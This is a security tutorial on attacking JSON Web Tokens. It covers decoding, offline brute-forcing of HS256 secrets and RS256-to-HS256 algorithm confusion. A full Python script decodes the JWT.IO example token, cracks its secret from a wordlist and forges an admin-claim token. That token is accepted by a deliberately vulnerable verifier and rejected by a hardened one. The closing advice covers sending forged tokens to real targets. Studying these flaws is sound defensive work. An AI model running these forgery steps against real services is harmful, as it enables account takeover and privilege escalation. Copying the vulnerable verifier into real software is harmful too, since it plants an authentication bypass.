JWT

JSON Web Token (JWT, RFC 7519) is a standard, URL-safe format for passing claims between client and server. In practice almost every JWT you meet is a signed token (a JWS): three base64url-encoded parts, header.payload.signature, where the header names the signing algorithm and the signature lets the server check that the claims were not tampered with.

Below is the "example JWT" from JWT.IO:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

Notice the "." between each part, and notice that each part begins with "eyJ": that is simply base64url for `{"`, the start of a JSON object, so it is a strong sign you are looking at a JWT. A signed JWT is not encrypted; the header and payload are only base64url-encoded and anyone holding the token can read them (the example above decodes to header `{"alg":"HS256","typ":"JWT"}` and payload `{"sub":"1234567890","name":"John Doe","iat":1516239022}`). If you find a JWT in the wild and want to view the contents, use a decoder such as https://jwt.ms or https://jwt.io, or decode it locally with a one-liner; prefer the local route for tokens from a real engagement, since pasting a live session token into a third-party site hands it to that site.

If the algorithm is HMAC with SHA, such as HS256, the signature is keyed with a shared secret, and the token itself is all you need to brute-force that secret offline: recompute the HMAC over header.payload with each candidate and compare it to the signature (hashcat mode 16500 and jwt_tool both do this). Maybe the key is something simple like Password123, or the default from the library's README. Once you have the secret you can sign any claims you like, so a weak HS256 secret is a full token-forgery bug, not just an information leak.

If the algorithm is RSA with SHA, such as RS256, the token is signed with the server's private key and verified with its public key, which is often published (a JWKS endpoint, a TLS certificate, or an API doc). The classic attack is algorithm confusion: change the header's alg to HS256 and sign the token with HMAC using the public key bytes (the PEM text, exactly as the server loads it) as the secret. A vulnerable library exposes a single verify(token, key) call, lets the token's own header choose the algorithm, and then feeds the same key argument into whichever branch runs, so the HMAC it computes with the "public key" matches yours and the private key is never consulted. Has this happened in the wild? Absolutely: Tim McLean's 2015 write-up documented exactly this flaw in several popular JWT libraries, and the fix in every case is the same, the server pins the expected algorithm and key type instead of trusting the header.

Once you can modify the JWT and produce a valid signature, you are ready to try escalating your account (an admin or role claim), changing your user (sub or user id), or possibly taking over the system. Check the rest of the server-side validation too: a forged token still needs an unexpired exp, the right aud and iss, and whatever claims the application actually reads.
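The three steps above (decode, brute-force an HS256 secret, HS256/RS256 confusion) in one runnable script, added here as an example and not code from the original page. It uses only the Python standard library. The JWT.IO example token and its known secret ("your-256-bit-secret") are real; the public key PEM and the candidate wordlist are constructed stand-ins, and vulnerable_verify / safe_verify are models of the library behaviour described above, not any particular library's code (the RS256 branch is left as an error because the standard library has no RSA and the forged token never reaches it anyway).

```python
import base64
import hashlib
import hmac
import json

# The "example JWT" from JWT.IO: HS256, signed with the secret "your-256-bit-secret".
EXAMPLE_JWT = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ."
    "SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"
)

# Constructed stand-in for the public key you would pull from the target (JWKS, cert, docs).
# Only its bytes matter for the confusion demo; it is not a real RSA key.
TARGET_PUBLIC_KEY_PEM = (
    "-----BEGIN PUBLIC KEY-----\n"
    "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAconstructedkeyforthedemo0\n"
    "-----END PUBLIC KEY-----\n"
)

HS_DIGESTS = {"HS256": hashlib.sha256, "HS384": hashlib.sha384, "HS512": hashlib.sha512}


def b64url_decode(s: str) -> bytes:
    # JWTs drop base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def decode_jwt(token: str):
    """Step 1: read header and claims without verifying anything (what jwt.io does)."""
    h, p, _sig = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p))


def hs_sign(signing_input: bytes, key: bytes, alg: str) -> bytes:
    return hmac.new(key, signing_input, HS_DIGESTS[alg]).digest()


def brute_force_hs(token: str, candidates):
    """Step 2: offline brute force. Re-sign header.payload with each candidate secret
    and compare against the token's own signature; no requests to the server."""
    h, p, sig = token.split(".")
    alg = json.loads(b64url_decode(h))["alg"]
    signing_input = f"{h}.{p}".encode()
    target = b64url_decode(sig)
    for secret in candidates:
        if hmac.compare_digest(hs_sign(signing_input, secret.encode(), alg), target):
            return secret
    return None


def forge_hs(payload: dict, key: bytes, alg: str = "HS256") -> str:
    """Build a token with arbitrary claims, HMAC-signed with whatever key bytes we hold."""
    h = b64url_encode(json.dumps({"alg": alg, "typ": "JWT"}, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    return f"{h}.{p}.{b64url_encode(hs_sign(f'{h}.{p}'.encode(), key, alg))}"


def _check_signature(h: str, p: str, sig: str, alg: str, key: bytes) -> dict:
    signing_input = f"{h}.{p}".encode()
    if alg in HS_DIGESTS:
        if not hmac.compare_digest(hs_sign(signing_input, key, alg), b64url_decode(sig)):
            raise ValueError("bad signature")
        return json.loads(b64url_decode(p))
    if alg.startswith("RS"):
        # A real RSA verification would go here (needs e.g. the `cryptography` package).
        # The confusion attack works precisely because a forged HS token never reaches it.
        raise NotImplementedError("RSA verification not included in this example")
    raise ValueError(f"unsupported alg {alg!r}")


def vulnerable_verify(token: str, key: bytes) -> dict:
    """Step 3, the bug: the token's own header picks the algorithm, and the single `key`
    argument (meant to be the RSA public key) is fed to whichever branch that selects."""
    h, p, sig = token.split(".")
    alg = json.loads(b64url_decode(h))["alg"]
    return _check_signature(h, p, sig, alg, key)


def safe_verify(token: str, key: bytes, expected_alg: str) -> dict:
    """Hardened: the server decides the algorithm; a header that disagrees is rejected
    before any cryptography runs, so public-key bytes can never become an HMAC secret."""
    h, p, sig = token.split(".")
    if json.loads(b64url_decode(h)).get("alg") != expected_alg:
        raise ValueError("algorithm mismatch")
    return _check_signature(h, p, sig, expected_alg, key)


if __name__ == "__main__":
    print(decode_jwt(EXAMPLE_JWT))
    print("secret:", brute_force_hs(EXAMPLE_JWT, ["Password123", "secret", "your-256-bit-secret"]))
    forged = forge_hs({"sub": "1234567890", "admin": True}, TARGET_PUBLIC_KEY_PEM.encode())
    print("vulnerable verifier accepted:", vulnerable_verify(forged, TARGET_PUBLIC_KEY_PEM.encode()))
    try:
        safe_verify(forged, TARGET_PUBLIC_KEY_PEM.encode(), "RS256")
    except ValueError as e:
        print("safe verifier rejected:", e)
```

The only difference between the two verifiers is who chooses the algorithm. When testing a real target, send the forged HS256 token in the same place the original was sent (Authorization header or cookie) and watch whether the response changes with the claims you set; if the public key you used is not byte-for-byte the one the server loads (trailing newline, PKCS#1 vs SubjectPublicKeyInfo wrapping), the HMAC will not match even on a vulnerable server, so try the common encodings.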
